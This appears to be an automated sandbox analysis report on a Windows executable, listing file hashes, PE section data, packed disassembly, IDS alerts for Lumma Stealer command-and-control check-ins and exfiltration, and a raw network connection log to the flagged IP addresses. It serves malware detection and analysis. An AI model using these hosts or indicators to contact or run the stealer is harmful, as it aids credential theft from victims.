                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:09:04 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):297690
                                                                                                                                                                              Entropy (8bit):1.4616883427354084
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:vMBBud4V0PzNzFJGdKVx7qGJF+sCs78j9oD0m:ve2FH/mwT778GD0m
                                                                                                                                                                              MD5:C86C110440210B809936AD4BEADB65BC
                                                                                                                                                                              SHA1:62CE826C39D247D7B96662867CA2BF1514017012
                                                                                                                                                                              SHA-256:4DD8C7E438DF539EC868837CB5BCED0428A4BE514A01BF10438928377CCD750D
                                                                                                                                                                              SHA-512:06E336260B351FD89E468447A1E396FA9627FB592FA654F573501E06E86A94BD26AC62DA308C00C991B1A9CFA71A536CBBE43C7C0F38AC0650D13A571038040B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MDMP..a..... .........ig....................................D....'..........H...........`.......8...........T...........xL..b>...........)...........*..............................................................................eJ.......+......GenuineIntel............T...........o.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):8382
                                                                                                                                                                              Entropy (8bit):3.704614965580477
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:R6l7wVeJo96c6YWMPSUMgmfgIprD89b/Ssf81m:R6lXJa6c6Y/SUMgmfgR/Rfj
                                                                                                                                                                              MD5:9274641D31CEC413B5AEE4B598201D5F
                                                                                                                                                                              SHA1:439F1616730E9E39E28A2532978B711E0EB04739
                                                                                                                                                                              SHA-256:6C051F095646B2754CBFD8005D37D62E2998C8BB43FC187B8E5949A43DBD1F96
                                                                                                                                                                              SHA-512:43BF09323E4B9C3709FF74EEF55B931D90BFF5F6914E0C2C14ED28BA3898397FF5BF21057C3354AD36EA5224C8D4E39C0995B5904A1AD77A3024E7A72F306D8C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.0.0.<./.P.i.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4624
                                                                                                                                                                              Entropy (8bit):4.5036273149650885
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:cvIwWl8zsnMJg77aI9bwWpW8VYTYm8M4JNKcFBGT+q8T6rpTBzowd:uIjfnKI7pJ7VHJ0THp9zowd
                                                                                                                                                                              MD5:4D1562EDA9676FB9122379AE950DDD36
                                                                                                                                                                              SHA1:0873237188E2DC5E01BE5C15E5F5EDA70E9F84A8
                                                                                                                                                                              SHA-256:D16F9E5E8D30774CF5173019760AAB2F3B97E7081AA9346852CF7AA26E4B0B6A
                                                                                                                                                                              SHA-512:D39E1F357738789AE94C86A59A65CF37B83BC9C88465B042F3F6539B4ABA93883E3C0B74788E5BEF1F91627B12F6B5DCA1F6C124112A3BF51BFDFF7A3EB5DD28
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.295978076121154
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:w41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+rWmBMZJh1VjE:t1/YCW2AoQ0NiRWwMHrVg
                                                                                                                                                                              MD5:B1DB8810161652B78E77A7D170C05360
                                                                                                                                                                              SHA1:74362D15CA3B82EBBD2C85089368A71C8498E653
                                                                                                                                                                              SHA-256:42E79B4CB61255D1B8AA40D0A19A30F6F5DAE3281D5C0BE1C87B53AE5924A885
                                                                                                                                                                              SHA-512:E364D0CD05EEA3E2AF31E073AE219EF3C584A74E1A67695F85BD4149B73F5D10A3E87AAF35F68C56B9876E302AB582A2E1DF0C7A9636A15BBA4C5E69E418C669
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U..............................................................................................................................................................................................................................................................................................................................................)O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):6.5726135493498505
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:zLP3oiwG1g.exe
                                                                                                                                                                              File size:2'994'688 bytes
                                                                                                                                                                              MD5:ad848f9eed40c0533c28f2c521395df8
                                                                                                                                                                              SHA1:4033ed1deb63922a6f73a35204db425fe0d3b559
                                                                                                                                                                              SHA256:464199a09a215759b285df6462e2cbcfcecf601844c666da6e9de258a0a5d4e9
                                                                                                                                                                              SHA512:6b5545b1f038c8699bb919da3c035bb97ebce0de374e19d2b5de12f234be71c48562c2d5c6085e70926ed78a2ea7609b87521b967336d5b64d096d7afaf37364
                                                                                                                                                                              SSDEEP:49152:CXHlm2mehou699Jy+TubbJZ6IlNTNSflUE:m82meKuk9Jy+TOEIl/S
                                                                                                                                                                              TLSH:6ED54A5BB605B6DFE48A22785627CE82599D83FA47180CC3D82D74BBBD63CC111F6D28
                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................0...........@...........................0.....GX....@.................................T0..h..
                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                              Entrypoint:0x709000
                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:6
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp 00007FC69CEEE01Ah
                                                                                                                                                                              seto byte ptr [00000000h]
                                                                                                                                                                              add cl, ch
                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              inc ecx
                                                                                                                                                                              push bx
                                                                                                                                                                              dec esi
                                                                                                                                                                              dec ebp
                                                                                                                                                                              das
                                                                                                                                                                              xor al, 36h
                                                                                                                                                                              dec edi
                                                                                                                                                                              bound ecx, dword ptr [ecx+4Ah]
                                                                                                                                                                              dec edx
                                                                                                                                                                              insd
                                                                                                                                                                              push edi
                                                                                                                                                                              dec eax
                                                                                                                                                                              dec eax
                                                                                                                                                                              jbe 00007FC69CEEE082h
                                                                                                                                                                              push esi
                                                                                                                                                                              dec edx
                                                                                                                                                                              popad
                                                                                                                                                                              je 00007FC69CEEE07Bh
                                                                                                                                                                              push edx
                                                                                                                                                                              dec esi
                                                                                                                                                                              jc 00007FC69CEEE08Ah
                                                                                                                                                                              cmp byte ptr [ebx], dh
                                                                                                                                                                              push edx
                                                                                                                                                                              jns 00007FC69CEEE057h
                                                                                                                                                                              or eax, 49674B0Ah
                                                                                                                                                                              cmp byte ptr [edi+43h], dl
                                                                                                                                                                              jnc 00007FC69CEEE05Dh
                                                                                                                                                                              bound eax, dword ptr [ecx+30h]
                                                                                                                                                                              pop edx
                                                                                                                                                                              inc edi
                                                                                                                                                                              push esp
                                                                                                                                                                              push 43473163h
                                                                                                                                                                              aaa
                                                                                                                                                                              push edi
                                                                                                                                                                              dec esi
                                                                                                                                                                              xor ebp, dword ptr [ebx+59h]
                                                                                                                                                                              push edi
                                                                                                                                                                              push edx
                                                                                                                                                                              pop eax
                                                                                                                                                                              je 00007FC69CEEE067h
                                                                                                                                                                              xor dl, byte ptr [ebx+2Bh]
                                                                                                                                                                              popad
                                                                                                                                                                              jne 00007FC69CEEE05Ch
                                                                                                                                                                              dec eax
                                                                                                                                                                              dec ebp
                                                                                                                                                                              jo 00007FC69CEEE053h
                                                                                                                                                                              xor dword ptr [edi], esi
                                                                                                                                                                              inc esp
                                                                                                                                                                              dec edx
                                                                                                                                                                              dec ebp
                                                                                                                                                                              jns 00007FC69CEEE060h
                                                                                                                                                                              insd
                                                                                                                                                                              jnc 00007FC69CEEE080h
                                                                                                                                                                              aaa
                                                                                                                                                                              inc esp
                                                                                                                                                                              inc ecx
                                                                                                                                                                              inc ebx
                                                                                                                                                                              xor dl, byte ptr [ecx+4Bh]
                                                                                                                                                                              inc edx
                                                                                                                                                                              inc esp
                                                                                                                                                                              bound esi, dword ptr [ebx]
                                                                                                                                                                              or eax, 63656B0Ah
                                                                                                                                                                              jno 00007FC69CEEE068h
                                                                                                                                                                              push edx
                                                                                                                                                                              insb
                                                                                                                                                                              js 00007FC69CEEE081h
                                                                                                                                                                              outsb
                                                                                                                                                                              inc ecx
                                                                                                                                                                              jno 00007FC69CEEE062h
                                                                                                                                                                              push ebp
                                                                                                                                                                              inc esi
                                                                                                                                                                              pop edx
                                                                                                                                                                              xor eax, dword ptr [ebx+36h]
                                                                                                                                                                              push eax
                                                                                                                                                                              aaa
                                                                                                                                                                              imul edx, dword ptr [ebx+58h], 4Eh
                                                                                                                                                                              aaa
                                                                                                                                                                              inc ebx
                                                                                                                                                                              jbe 00007FC69CEEE05Ch
                                                                                                                                                                              dec ebx
                                                                                                                                                                              js 00007FC69CEEE053h
                                                                                                                                                                              jne 00007FC69CEEE041h
                                                                                                                                                                              push esp
                                                                                                                                                                              inc bp
                                                                                                                                                                              outsb
                                                                                                                                                                              inc edx
                                                                                                                                                                              popad
                                                                                                                                                                              dec ebx
                                                                                                                                                                              insd
                                                                                                                                                                              dec ebp
                                                                                                                                                                              inc edi
                                                                                                                                                                              xor dword ptr [ecx+36h], esp
                                                                                                                                                                              push 0000004Bh
                                                                                                                                                                              sub eax, dword ptr [ebp+33h]
                                                                                                                                                                              jp 00007FC69CEEE06Ch
                                                                                                                                                                              dec edx
                                                                                                                                                                              xor bh, byte ptr [edx+56h]
                                                                                                                                                                              bound eax, dword ptr [edi+66h]
                                                                                                                                                                              jbe 00007FC69CEEE04Ah
                                                                                                                                                                              dec eax
                                                                                                                                                                              or eax, 506C720Ah
                                                                                                                                                                              aaa
                                                                                                                                                                              xor dword ptr fs:[ebp+62h], ecx
                                                                                                                                                                              arpl word ptr [esi], si
                                                                                                                                                                              inc esp
                                                                                                                                                                              jo 00007FC69CEEE083h
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              0x10000x510000x2480064bc49734a61d81402b396dd2ac23f0eFalse0.9973311750856164data7.979217064192899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              hzyqibdm0x540000x2b40000x2b3200bde9a2d008a7a2898ba5440f40d8aa09unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              ehrkmnwb0x3080000x10000x4007d2fc17d416ac50b5f876f4e66a9bd18False0.828125data6.453666103595028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .taggant0x3090000x30000x22003071aff07a324d9a2331ed5786438138False0.35466452205882354DOS executable (COM)3.888782406653298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              DLLImport
                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-12-23T08:08:36.728457+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049713104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:37.462740+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049713104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:37.462740+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049713104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:38.709148+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049719104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:39.480311+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049719104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:39.480311+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049719104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:41.383464+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049725104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:44.094130+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049731104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:46.420577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049737104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:49.010535+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049743104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:51.511498+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049751104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:51.521970+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049751104.21.36.201443TCP
                                                                                                                                                                              2024-12-23T08:08:56.654674+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049768172.67.199.72443TCP
                                                                                                                                                                              2024-12-23T08:08:57.453439+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049768172.67.199.72443TCP
                                                                                                                                                                              2024-12-23T08:08:59.223387+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049774185.166.143.48443TCP
                                                                                                                                                                              2024-12-23T08:09:01.563690+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.104978052.217.67.100443TCP
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 23, 2024 08:08:35.509622097 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:35.509675026 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:35.509793997 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:35.511138916 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:35.511152029 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:36.728247881 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:36.728456974 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:36.731601000 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:36.731611013 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:36.731899977 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:36.781516075 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:36.813309908 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:36.813350916 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:36.813741922 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:37.462672949 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:37.462759972 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:37.462805033 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:37.481142998 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:37.481161118 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:37.481175900 CET49713443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:37.481182098 CET44349713104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:37.494977951 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:37.495007992 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:37.495070934 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:37.495537043 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:37.495548964 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:38.708992958 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:38.709147930 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:38.710475922 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:38.710488081 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:38.710724115 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:38.711857080 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:38.711857080 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:38.711918116 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.480329990 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.480382919 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.480418921 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.480442047 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.480444908 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.480472088 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.480492115 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.488609076 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.488672972 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.488699913 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.499774933 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.499830961 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.499849081 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.499859095 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.499907017 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.508096933 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.562764883 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.607773066 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.656505108 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.656528950 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.677875996 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.677920103 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.677922964 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.677934885 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.677979946 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.677985907 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.678009987 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.678045988 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.680181980 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.680188894 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:39.680219889 CET49719443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:39.680224895 CET44349719104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:40.170363903 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:40.170419931 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:40.170506954 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:40.170802116 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:40.170815945 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:41.383373976 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:41.383464098 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:41.384768963 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:41.384789944 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:41.385031939 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:41.386532068 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:41.387036085 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:41.387063980 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:42.463498116 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:42.463597059 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:42.463676929 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:42.510792017 CET49725443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:42.510831118 CET44349725104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:42.879676104 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:42.879734039 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:42.879826069 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:42.880125046 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:42.880136013 CET44349731104.21.36.201192.168.2.10
